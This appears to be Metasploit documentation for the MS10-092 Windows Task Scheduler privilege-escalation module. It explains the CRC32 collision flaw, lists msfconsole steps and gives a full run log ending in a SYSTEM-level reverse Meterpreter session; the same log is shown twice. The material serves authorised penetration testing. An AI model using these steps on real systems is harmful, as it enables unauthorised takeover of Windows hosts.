documentation/modules/exploit/windows/local/ms10_092_schelevator.md

## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

## Scenarios

## Verification Steps

1. Start msfconsole
2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
3. Do: `set SESSION [#]`
4. Do: `run`

### A run on Windows Vista (Build 6000) and Kali Linux 2019.3

  ```
  msf > use modules/exploits/windows/local/ms10_092_schelevator
  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
    SESSION => 1
  msf5 exploit(windows/local/ms10_092_schelevator) > run  
    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
    [*] Creating task: TzAZ6H4K
    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
    [*] SCHELEVATOR
    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
    [*] Original CRC32: 0x69b1db25
    [*] Final CRC32: 0x69b1db25
    [*] Writing our modified content back...
    [*] Validating task: TzAZ6H4K
    [*]
    [*] Folder: \
    [*] TaskName                                   Next Run Time        Status
    [*] ========================================== ==================== ===============
    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
    [*] SCHELEVATOR
    [*] Disabling the task...
    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
    [*] SCHELEVATOR
    [*] Enabling the task...
    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
    [*] SCHELEVATOR
    [*] Executing the task...
    [*] Sending stage (180291 bytes) to 192.168.1.2
    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
    [*] SCHELEVATOR
    [*] Deleting the task...
    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
    [*] SCHELEVATOR
  ```
Create ms15_100_mcl_exe.md and Create ms10_092_schelevator.md 2019-11-27 18:12:57 -07:00			`## Vulnerable Application`

			`This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.`

			`## Scenarios`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
			3. Do: `set SESSION [#]`
			4. Do: `run`

			`### A run on Windows Vista (Build 6000) and Kali Linux 2019.3`

			```
			`msf > use modules/exploits/windows/local/ms10_092_schelevator`
			`msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1`
			`SESSION => 1`
			`msf5 exploit(windows/local/ms10_092_schelevator) > run`
			`[*] Started reverse TCP handler on 192.168.1.3:4444`
			`[*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe`
			`[*] Creating task: TzAZ6H4K`
			`[*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.`
			`[*] SCHELEVATOR`
			`[*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...`
			`[*] Original CRC32: 0x69b1db25`
			`[*] Final CRC32: 0x69b1db25`
			`[*] Writing our modified content back...`
			`[*] Validating task: TzAZ6H4K`
			`[*]`
			`[*] Folder: \`
			`[*] TaskName Next Run Time Status`
			`[*] ========================================== ==================== ===============`
			`[*] TzAZ6H4K 12/1/2019 10:41:00 A Ready`
			`[*] SCHELEVATOR`
			`[*] Disabling the task...`
			`[*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.`
			`[*] SCHELEVATOR`
			`[*] Enabling the task...`
			`[*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.`
			`[*] SCHELEVATOR`
			`[*] Executing the task...`
			`[*] Sending stage (180291 bytes) to 192.168.1.2`
			`[*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".`
			`[*] SCHELEVATOR`
			`[*] Deleting the task...`
			`[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700`
			`[*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.`
			`[*] SCHELEVATOR`
			```